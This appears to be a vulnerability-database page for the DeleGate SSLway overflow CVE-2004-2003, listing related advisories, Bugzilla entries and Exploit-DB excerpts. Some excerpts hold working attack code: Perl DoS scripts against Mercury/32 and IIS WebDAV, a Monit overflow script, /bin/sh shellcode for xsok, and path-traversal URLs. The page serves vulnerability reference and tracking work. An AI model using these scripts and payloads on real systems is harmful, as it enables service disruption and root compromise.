CVE-2004-2003
published 2004-05-06CVE-2004-2003: Buffer overflow in the ssl_prcert function in the SSLway filter (sslway.c) for DeleGate 8.9.2 and earlier allows remote attackers to execute arbitrary code via…
PriorityP336high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.55%
93.0th percentile
Buffer overflow in the ssl_prcert function in the SSLway filter (sslway.c) for DeleGate 8.9.2 and earlier allows remote attackers to execute arbitrary code via a certificate with a long (1) subject or (2) issuer name field.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
| delegate | delegate | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-frvx-gppg-h8rp: Buffer overflow in the ssl_prcert function in the SSLway filter (sslway
ghsa_unreviewed·2022-04-29
CVE-2004-2003 [HIGH] GHSA-frvx-gppg-h8rp: Buffer overflow in the ssl_prcert function in the SSLway filter (sslway
Buffer overflow in the ssl_prcert function in the SSLway filter (sslway.c) for DeleGate 8.9.2 and earlier allows remote attackers to execute arbitrary code via a certificate with a long (1) subject or (2) issuer name field.
Red Hat
openssh information disclosure
vendor_redhat·2004-04-12·CVSS 5.0
CVE-2004-2760 [MEDIUM] openssh information disclosure
openssh information disclosure
sshd in OpenSSH 3.5p1, when PermitRootLogin is disabled, immediately closes the TCP connection after a root login attempt with the correct password, but leaves the connection open after an attempt with an incorrect password, which makes it easier for remote attackers to guess the password by observing the connection state, a different vulnerability than CVE-2003-0190. NOTE: it could be argued that in most environments, this does not cross privilege boundaries without requiring leverage of a separate vulnerability.
Statement: The risks associated with fixing this bug are greater than the low severity security risk. We therefore currently have no plans to fix this flaw in Red Hat Enterprise Linux 2.1 which is in maintenance mode.
Red Hat
security flaw
vendor_redhat·2004-01-14·CVSS 7.5
CVE-2003-0989 [HIGH] security flaw
security flaw
tcpdump before 3.8.1 allows remote attackers to cause a denial of service (infinite loop) via certain ISAKMP packets, a different vulnerability than CVE-2004-0057.
Red Hat
CVE-2005-1730: Multiple vulnerabilities in the OpenSSL ASN
vendor_redhat·CVSS 5.0
CVE-2005-1730 [MEDIUM] CVE-2005-1730: Multiple vulnerabilities in the OpenSSL ASN
Multiple vulnerabilities in the OpenSSL ASN.1 parser, as used in Novell iManager 2.0.2, allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted packets, as demonstrated by "OpenSSL ASN.1 brute forcer." NOTE: this issue might overlap CVE-2004-0079, CVE-2004-0081, or CVE-2004-0112.
Statement: Based on our research we believe that the "OpenSSL ASN.1 brute forcer." is actually exploiting flaws CVE-2003-0543, CVE-2003-0544, CVE-2003-0545. Those issues are all addressed in Red Hat Enterprise Linux and therefore CVE-2005-1730 is a duplicate assignment.
No detection rules found.
Exploit-DB
eshtery CMS - SQL Injection
exploitdb·2010-09-12
CVE-2010-3404 eshtery CMS - SQL Injection
eshtery CMS - SQL Injection
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub12-eshtery-cms-sql-injection-vulnerability/
'''
Abysssec Inc Public Advisory
Title : eshtery CMS Sql Injection Vulnerability
Affected Version : eshtery copyrights 2003-2004
Discovery : www.abysssec.com
Vendor : http://eshtery.she7ata.com/projects/eshtery/
Demo : http://eshtery.she7ata.com/projects/eshtery/
Download Links : http://sourceforge.net/projects/eshtery/
Description :
1) SQL Injection
for successful injection in this cms you have to pass two steps.
Step 1:
Go to this path:
http://Example.com/catlgsearch.aspx
and enter this value
Exploit-DB
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
exploitdb·2008-03-07
CVE-2008-0118 Microsoft Office 2000/2003/2004/XP - File Memory Corruption
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
---
source: https://www.securityfocus.com/bid/28146/info
Microsoft Office is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open a malicious Office file.
Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31361.tgz
Exploit-DB
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
exploitdb·2005-12-08
CVE-2005-4131 Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB
Solaris 2.6/7/8/9 (SPARC) - 'ld.so.1' Local Privilege Escalation
exploitdb·2004-12-24
CVE-2003-0609 Solaris 2.6/7/8/9 (SPARC) - 'ld.so.1' Local Privilege Escalation
Solaris 2.6/7/8/9 (SPARC) - 'ld.so.1' Local Privilege Escalation
---
/*
* $Id: raptor_ldpreload.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_ldpreload.c - ld.so.1 local, Solaris/SPARC 2.6/7/8/9
* Copyright (c) 2003-2004 Marco Ivaldi
*
* Stack-based buffer overflow in the runtime linker, ld.so.1, on Solaris 2.6
* through 9 allows local users to gain root privileges via a long LD_PRELOAD
* environment variable (CAN-2003-0609).
*
* This exploit uses the ret-into-ld.so technique, to effectively bypass the
* non-executable stack protection (noexec_user_stack=1 in /etc/system). This
* is a weird vulnerability indeed: the standard ret-into-stack doesn't seem
* to work properly for some reason (SEGV_ACCERR), and at least my version of
* Solaris 8 (Generic_108528-13) is very hard to exploi
Exploit-DB
Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)
exploitdb·2004-12-24
CVE-2003-0834 Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)
Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)
---
/*
* $Id: raptor_libdthelp.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_libdthelp.c - libDtHelp.so local, Solaris/SPARC 7/8/9
* Copyright (c) 2003-2004 Marco Ivaldi
*
* Buffer overflow in CDE libDtHelp library allows local users to execute
* arbitrary code via a modified DTHELPUSERSEARCHPATH environment variable
* and the Help feature (CAN-2003-0834).
*
* Possible attack vectors are: DTHELPSEARCHPATH (as used in this exploit),
* DTHELPUSERSEARCHPATH, LOGNAME (those two require a slightly different
* exploitation technique, due to different code paths).
*
* Usage:
* $ gcc raptor_libdthelp.c -o raptor_libdthelp -Wall
* [on your xserver: disable the access control]
* $ ./raptor_libdthelp 192.168.1.1:0
* [on your xserver: ent
Exploit-DB
Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
exploitdb·2004-12-23
CVE-2004-1306 Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
---
source: https://www.securityfocus.com/bid/12091/info
Microsoft Windows is prone to an integer overflow vulnerability. This issue exists in 'winhlp32.exe' and is exposed when a malformed phrase compressed Windows Help file (.hlp) is processed by the program.
Successful exploitation may allow execution of arbitrary code in the context of the user that opens the malicious Help file. The Help file may originate from an external or untrusted source, so this vulnerability is considered remote in nature.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25049.gz
Exploit-DB
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
exploitdb·2004-12-01
CVE-2004-2513 Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
---
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
sleep(1);
print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
sleep(1);
print $socket "0001 CHECK " . "A" x 512 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
# milw0rm.com [2004-12-01]
Exploit-DB
Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow
exploitdb·2004-11-02
CVE-2004-1050 Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow
Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow
---
BoF PoC exploit
iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever.
YS, .ss ,sY" http://www.edup.tudelft.nl/~bjwever
`"YSSP" sSS
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston,
Exploit-DB
Microsoft IIS - WebDAV XML Denial of Service (MS04-030)
exploitdb·2004-10-20
CVE-2003-0718 Microsoft IIS - WebDAV XML Denial of Service (MS04-030)
Microsoft IIS - WebDAV XML Denial of Service (MS04-030)
---
#!/usr/bin/perl
# IIS BlowOut
# POC exploit for MS04-030. Found by Amit Klein.
# incognito_ergo yahoo com
# usage: perl ms04-030_spl.pl host port
use IO::Socket;
$port = @ARGV[1];
$host = @ARGV[0];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>
$port,Proto => "TCP");
for ($count=1; $count\r\n\r\n\r\n\r\n\r\n";
$l=length($xmldata);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost:
$host\nContent-length: $l\n\n$xmldata\n\n";
syswrite($socket,$req,length($req));
close $socket;
# milw0rm.com [2004-10-20]
Exploit-DB
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
---
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
pax: illegal option--h
Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
[-t device] [-x format] [pathname...]
pax -r -w [-ilmopuvy] [
Exploit-DB
Gattaca Server 2003 - 'web.tmpl?Language' CPU Consumption (Denial of Service)
exploitdb·2004-07-15
CVE-2004-2519 Gattaca Server 2003 - 'web.tmpl?Language' CPU Consumption (Denial of Service)
Gattaca Server 2003 - 'web.tmpl?Language' CPU Consumption (Denial of Service)
---
source: https://www.securityfocus.com/bid/10728/info
It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities.
These vulnerabilities allow a remote attacker to crash the application, denying service to legitimate users.
Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http://www.example.com/web.tmpl?HEL
Exploit-DB
Gattaca Server 2003 - Null Byte Full Path Disclosure
exploitdb·2004-07-15
CVE-2004-2518 Gattaca Server 2003 - Null Byte Full Path Disclosure
Gattaca Server 2003 - Null Byte Full Path Disclosure
---
source: https://www.securityfocus.com/bid/10729/info
It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities.
By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application to return error pages that contain the full installation path of the application and the web document root path.
These vulnerabilities could be used by an attacker to aid them in further attacks against the server.
Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well.
http://www.example.com/%00
Exploit-DB
Gattaca Server 2003 - 'Language' Path Exposure
exploitdb·2004-07-15
CVE-2004-2518 Gattaca Server 2003 - 'Language' Path Exposure
Gattaca Server 2003 - 'Language' Path Exposure
---
source: https://www.securityfocus.com/bid/10729/info
It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities.
By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application to return error pages that contain the full installation path of the application and the web document root path.
These vulnerabilities could be used by an attacker to aid them in further attacks against the server.
Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]
Exploit-DB
Norton AntiVirus - Denial of Service
exploitdb·2004-07-12
CVE-2004-0683 Norton AntiVirus - Denial of Service
Norton AntiVirus - Denial of Service
---
Norton AntiVirus Denial Of Service Vulnerability
*vulnerable [...only tested on!]
Symantec Norton AntiVirus 2003 Professional Edition
Symantec Norton AntiVirus 2002
*not vulnerable
Mcafee 7*
Mcafee 8*
Risk Impact: Medium
Remote: yes
Description:
While having a virus scan [automatic/manual] of some specially crafted compressed files; NAV triggers a DoS using 100% CPU for a very long time. Morover, NAV is unable to stop the scan in middle, even if the user wishes to manually stop the virus scan.
Then, in this situation the only alternate is to kill the process.
--- [Proof of Concept] ---
Please download this file.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/312.zip (av_bomb_3.zip) <--- For symantec.
The
Exploit-DB
Symantec Multiple Firewall - DNS Response Denial of Service
exploitdb·2004-05-16
CVE-2004-0445 Symantec Multiple Firewall - DNS Response Denial of Service
Symantec Multiple Firewall - DNS Response Denial of Service
---
/* HOD-symantec-firewall-DoS-expl.c:
*
* Symantec Multiple Firewall DNS Response Denial-of-Service
*
* Exploit version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
*
* Bug discoveried by eEye:
* http://www.eeye.com/html/Research/Advisories/AD20040512B.html
*
* -------------------------------------------------------------------
* Tested on:
* - Symantec Norton Personal Firewall 2004
*
*
* Systems Affected:
* - Symantec Norton Internet Security 2002
* - Symantec Norton Internet Security 2003
* - Symantec Norton Internet Security 2004
* - Symantec Norton Internet Security Professional 2002
* - Symantec Norton Internet Security Professional 2003
* - Symantec Norton Internet Security Professional 2004
* - Symantec Norton Persona
Exploit-DB
Microsoft Outlook 2003 - Predictable File Location
exploitdb·2004-05-10
CVE-2004-0502 Microsoft Outlook 2003 - Predictable File Location
Microsoft Outlook 2003 - Predictable File Location
---
source: https://www.securityfocus.com/bid/10307/info
Microsoft Outlook 2003 is reported to be prone to store files that are specified in img tags, in predictable locations.
This may present a security risk because many known (and potential) Internet Explorer vulnerabilities depend on the attacker being able to directly reference malicious content on a victim system. Given both the ability to place such content on the file system and reference it specifically by location, exploitation of many browser-based vulnerabilities becomes possible.
Exploit-DB
DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC)
exploitdb·2004-05-06
CVE-2004-2003 DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC)
DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC)
---
source: https://www.securityfocus.com/bid/10295/info
A remote buffer overflow vulnerability has been reported to affect the DeleGate SSLway filter. This filter is employed when DeleGate is applying SSL to arbitrary protocols.
The issue presents itself due to a lack of sufficient boundary checks performed, when copying user-supplied certificate field contents.
A remote attacker may potentially exploit this issue, to overwrite the return address of the static ssl_prcert() function. The attacker may corrupt any other saved value that is within 768 bytes from the end of the affected buffers.
It has been reported that the X509_NAME_oneline() function will perform character conversion on characters below '0x20' or ab
Exploit-DB
TCP Connection Reset - Remote Denial of Service
exploitdb·2004-04-23
CVE-2004-0230 TCP Connection Reset - Remote Denial of Service
TCP Connection Reset - Remote Denial of Service
---
/*
By: Paul A. Watson
Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1
COMPILE:
gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a
or
gcc -o reset-tcp reset-tcp.c -lnet
** be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems!
EXECUTE:
reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size]
EXAMPLE (and timing packets sent with /bin/date):
[root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date
Tue Dec 16 21:18:28 CST 2003
Packets sent: 8192 Sequence guess: 536805376
Packets sent: 16384 Sequence guess: 1073676288
Packets sent: 24576 Sequence guess: 1610547200
Packets sent: 32768 Sequence guess: 2147418112
Packets sent: 40960 Sequence guess
Exploit-DB
Monit 4.1 - Remote Buffer Overflow
exploitdb·2004-04-09
CVE-2003-1083 Monit 4.1 - Remote Buffer Overflow
Monit 4.1 - Remote Buffer Overflow
---
#!/usr/bin/perl
#
# monit \n\n";
exit(0);
}
print "HOST:\t$ARGV[0]\n";
print "PORT:\t2812\n";
my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; # esp mandrake 9.1
#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug
print "connecting to server...\n";
$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],
PeerPort => 2812,
Proto => "tcp");
if(!defined($socket))
{
print "could not connect :-P\n";
sleep(1);
exit(0);
}
print "connected\n";
sleep(1);
print "sending string\n";
print $socket $buffer;
close $socket;
print "\ndosed!\n";
# milw0rm.com [2004-04-09]
Exploit-DB
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator
exploitdb·2004-02-18·CVSS 7.2
CVE-2004-0077 [HIGH] Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator
---
/*
* Proof-of-concept exploit code for do_mremap() #2
*
* EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1".
* EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/
*
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied
Exploit-DB
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
exploitdb·2004-01-15
CVE-2003-0985 Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
---
/*
* Linux kernel mremap() bound checking bug exploit.
*
* Bug found by Paul Starzetz
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define str(s) #s
#define xstr(s) str(s)
#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR 0x2000
#define
Exploit-DB
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)
exploitdb·2004-01-06
CVE-2003-0985 Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)
---
/*
* EDB Note: This will just "test" the vulnerability.
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/
/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General P
Exploit-DB
XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game
exploitdb·2004-01-02
CVE-2004-0074 XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game
XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game
---
/* 0x333xsok (2) => xsok 1.02 local game exploit
*
* Happy new year ! (2 :)
* coded by c0wboy
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
*
*/
#include
#include
#define BIN "/usr/games/xsok"
#define RETADD 0xbffffa3c
#define SIZE 200
unsigned char shellcode[] =
/* setregid (20,20) shellcode */
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
"\xcd\x80"
/* exec /bin/sh shellcode */
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
int main (int argc, char ** argv)
{
int i, ret = RETADD;
char out[SIZE];
fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n");
fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n");
int *xsok = (int *)(o
Exploit-DB
Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun
exploitdb·2003-11-24
CVE-2003-1083 Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun
Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun
---
source: https://www.securityfocus.com/bid/9099/info
A buffer overrun vulnerability has been discovered in Monit 4.1 and earlier that could be exploited remotely to gain root privileges. The problem occurs due to insufficient bounds checking when handling overly long HTTP requests. As a result, it may be possible for a remote attacker to corrupt sensitive process data in such a way that the execution flow of Monit can be controlled.
Successful exploitation of this condition could potentially allow for the execution of arbitrary code with root privileges.
// Michel, http://www.cycom.se
#!/usr/bin/perl
#
# Monit 4.1 (possibly earlier too) remote shell exploit (HTTP)
# (C) 2004 by Shadowinteger
#
# Verbatim copying, distribution and/o
Bugzilla
CVE-2023-25775 kernel: irdma: Improper access control
bugzilla·2023-08-11·CVSS 9.8
CVE-2023-25775 [CRITICAL] CVE-2023-25775 kernel: irdma: Improper access control
CVE-2023-25775 kernel: irdma: Improper access control
Improper access control in the Intel(R) Ethernet Controller RDMA driver for linux before version 1.9.30 may allow an unauthenticated user to potentially enable escalation of privilege via network access.
References:
http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00794.html
Discussion:
Created kernel tracking bugs for this issue:
Affects: fedora-all [bug 2231416]
---
This was fixed for Fedora with the 6.4.16 stable kernel updates.
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2024:2003 https://access.redhat.com/errata/RHSA-2024:2003
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2024:2004 https://
Bugzilla
CVE-2003-0985 security flaw
bugzilla·2018-08-16·CVSS 7.2
CVE-2003-0985 [HIGH] CVE-2003-0985 security flaw
CVE-2003-0985 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
Bugzilla
CVE-2003-0989 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2003-0989 [HIGH] CVE-2003-0989 security flaw
CVE-2003-0989 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
tcpdump before 3.8.1 allows remote attackers to cause a denial of service (infinite loop) via certain ISAKMP packets, a different vulnerability than CVE-2004-0057.
Bugzilla
CVE-2004-0077 security flaw
bugzilla·2018-08-16·CVSS 7.2
CVE-2004-0077 [HIGH] CVE-2004-0077 security flaw
CVE-2004-0077 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.
Bugzilla
CVE-2003-0987 httpd mod_digest nonce not verified
bugzilla·2008-01-28·CVSS 7.5
CVE-2003-0987 [HIGH] CVE-2003-0987 httpd mod_digest nonce not verified
CVE-2003-0987 httpd mod_digest nonce not verified
Common Vulnerabilities and Exposures assigned an identifier CVE-2003-0987 to the following vulnerability:
mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
References:
http://www.mail-archive.com/[email protected]/msg19007.html
http://www.mail-archive.com/[email protected]/msg19014.html
http://www.mandriva.com/security/advisories?name=MDKSA-2004:046
http://www.redhat.com/support/errata/RHSA-2004-600.html
http://www.redhat.com/support/errata/RHSA-2005-816.html
http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.529643
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57628-1
http://sunsolve.sun.com/search/document
Bugzilla
CVE-2004-0096 mod_python remote DoS
bugzilla·2008-01-28·CVSS 5.0
CVE-2004-0096 [MEDIUM] CVE-2004-0096 mod_python remote DoS
CVE-2004-0096 mod_python remote DoS
Common Vulnerabilities and Exposures assigned an identifier CVE-2004-0096 to the following vulnerability:
Unknown vulnerability in mod_python 2.7.9 allows remote attackers to cause a denial of service (httpd crash) via a certain query string, a variant of CAN-2003-0973.
References:
http://www.modpython.org/pipermail/mod_python/2004-January/014879.html
http://security.gentoo.org/glsa/glsa-200401-03.xml
http://www.redhat.com/support/errata/RHSA-2004-058.html
http://www.redhat.com/support/errata/RHSA-2004-063.html
Discussion:
This was addressed via:
Red Hat Enterprise Linux version 2.1 (RHSA-2004:058)
Red Hat Enterprise Linux version 3 (RHSA-2004:058)
Red Hat Linux 9 (RHSA-2004:063)
Bugzilla
CVE-2003-0618 leaks file existance information
bugzilla·2007-07-20·CVSS 2.1
CVE-2003-0618 [LOW] CVE-2003-0618 leaks file existance information
CVE-2003-0618 leaks file existance information
Clone for RHEL3 tracking
+++ This bug was initially created as a clone of Bug #114923 +++
CAN-2003-0618 was reported 2003Jul29 to Debian. You can test for the
existance of files even if you don't have permission to do so by using
the suidperl command.
$ su
# mkdir ~root/delme; chmod 700 ~root/delme;touch ~root/delme/1
# exit
$ suidperl ~root/delme/1
Script is not setuid/setgid in suidperl
$ suidperl ~root/delme/2
Can't open perl script "/root/delme/2": No such file ...
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=220486
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=203426
Affects: 2.1AS 2.1ES 2.1AW 2.1WS (5.6.1)
Affects: 3AS 3ES 3WS (5.8.0)
Debian released an errata for this issue in Feb 2004.
-- Additional comment from mjc@redh
Bugzilla
CVE-2003-0542 multiple flaws in Apache (CVE-2003-0542, CVE-2003-0987, CVE-2004-0940)
bugzilla·2005-10-25·CVSS 7.2
CVE-2003-0542 [HIGH] CVE-2003-0542 multiple flaws in Apache (CVE-2003-0542, CVE-2003-0987, CVE-2004-0940)
CVE-2003-0542 multiple flaws in Apache (CVE-2003-0542, CVE-2003-0987, CVE-2004-0940)
Several security issues have been found in various packages in Stronghold
4.0:
A flaw in the handling of regular expressions from configuration files
in the Apache HTTP Server could lead to a buffer overflow. To exploit this
issue, an attacker would need to have the ability to write to Apache
configuration files such as .htaccess or httpd.conf. (CVE-2003-0542)
mod_digest did not properly verify the nonce of a client response by using
